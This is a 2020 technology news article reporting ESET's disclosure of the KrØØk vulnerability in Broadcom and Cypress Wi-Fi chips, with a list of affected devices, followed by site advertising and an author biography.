Security Market Segment LS
Thursday, 27 February 2020 08:06

ESET team finds major Wi-Fi bug in Broadcom, Cypress chips Featured

ESET team finds major Wi-Fi bug in Broadcom, Cypress chips Image by Gerd Altmann from Pixabay

Slovakian security firm ESET has discovered a vulnerability in Wi-Fi chips made by Broadcom and Cypress that results in the changing of an encryption key to a string of zeroes when encrypting part of a user's communications.

Researchers Miloš Čermák and Robert Lipovsky said in a blog post on Wednesday that if an attack successfully used this flaw, then some wireless packets sent by a buggy device could be decrypted. The vulnerability has been given the name KrØØk.

Most common smartphones, tablets, laptops and IoT devices use chips from these two companies. In addition, Wi-Fi access points and routers with Broadcom chips are also vulnerable.

The flaw manifests itself after a device that is connected to a Wi-Fi access point is disassociated from the point; this happens in the normal run of things when a person moves from one Wi-Fi point to another or when Wi-Fi is switched off.

When this happens, the session encryption key is cleared and is normal behaviour as no more data is expected to be transferred.

But the ESET team found that all data frames remaining in a vulnerable chip's transmit buffer were sent on after being encrypted with this all-zero key.

"Since KrØØk (encryption with an all-zero TK) manifests itself following a disassociation, an adversary can exploit this by manually triggering disassociations – as opposed to the disassociations that occur naturally," the researchers said in a detailed paper about KrØØk.

"This is possible, because a disassociation can be triggered by a management data frame that’s unauthenticated and unencrypted."

An attacker could capture these data frames and subsequently decrypt them; the data could contain several kilobytes of potentially sensitive information.

In the blog post, Čermák and Lipovsky wrote: "Our tests confirmed that, prior to patching, some client devices by Amazon (Echo, Kindle), Apple (iPhone, iPad, MacBook), Google (Nexus), Samsung (Galaxy), Raspberry (Pi 3), Xiaomi (RedMi), as well as some access points by ASUS and Huawei, were vulnerable to KrØØk.

"This totalled to over a billion Wi-Fi-capable devices and access points, at a conservative estimate. Further, many other vendors whose products we did not test also use the affected chipsets in their devices."

Both WPA2-Personal and WPA2-Enterprise protocols, with AES-CCMP encryption, are affected, the duo said.

KrØØk was related to a flaw found by Belgian researcher Mathy Vanhoef of imec-DistriNet, KU Leuven, the ESET pair said, but it had its own distinct characteristics. "In the beginning of our research, we found KrØØk to be one of the possible causes behind the “reinstallation” of an all-zero encryption key, observed in tests for KRACK attacks," they said.

Details of the bug were released at the RSA security conference which is being held in San Francisco this week.

Client devices tested by ESET and found vulnerable:

  • Amazon Echo 2nd gen
  • Amazon Kindle 8th gen
  • Apple iPad mini 2
  • Apple iPhone 6, 6S, 8, XR
  • Apple MacBook Air Retina 13-inch 2018
  • Google Nexus 5
  • Google Nexus 6
  • Google Nexus 6S
  • Raspberry Pi 3
  • Samsung Galaxy S4 GT-I9505
  • Samsung Galaxy S8
  • Xiaomi Redmi 3S


As part of our Lead Machine Methodology we will help you get more leads, more customers and more business. Let us help you develop your digital marketing campaign

Digital Marketing is ideal in these tough times and it can replace face to face marketing with person to person marketing via the phone conference calls and webinars

Significant opportunity pipelines can be developed and continually topped up with the help of Digital Marketing so that deals can be made and deals can be closed

- Newsletter adverts in dynamic GIF slideshow formats

- News site adverts from small to large sizes also as dynamic GIF slideshow formats

- Guest Editorial - get your message out there and put your CEO in the spotlight

- Promotional News and Content - displayed on the homepage and all pages

- Leverage our proven event promotion methodology - The Lead Machine gets you leads

Contact Andrew our digital campaign designer on 0412 390 000 or via email



Security requirements such as confidentiality, integrity and authentication have become mandatory in most industries.

Data encryption methods previously used only by military and intelligence services have become common practice in all data transfer networks across all platforms, in all industries where information is sensitive and vital (financial and government institutions, critical infrastructure, data centres, and service providers).

Get the full details on Layer-1 encryption solutions straight from PacketLight’s optical networks experts.

This white paper titled, “When 1% of the Light Equals 100% of the Information” is a must read for anyone within the fiber optics, cybersecurity or related industry sectors.

To access click Download here.


Sam Varghese

website statistics

Sam Varghese has been writing for iTWire since 2006, a year after the site came into existence. For nearly a decade thereafter, he wrote mostly about free and open source software, based on his own use of this genre of software. Since May 2016, he has been writing across many areas of technology. He has been a journalist for nearly 40 years in India (Indian Express and Deccan Herald), the UAE (Khaleej Times) and Australia (Daily Commercial News (now defunct) and The Age). His personal blog is titled Irregular Expression.



Recent Comments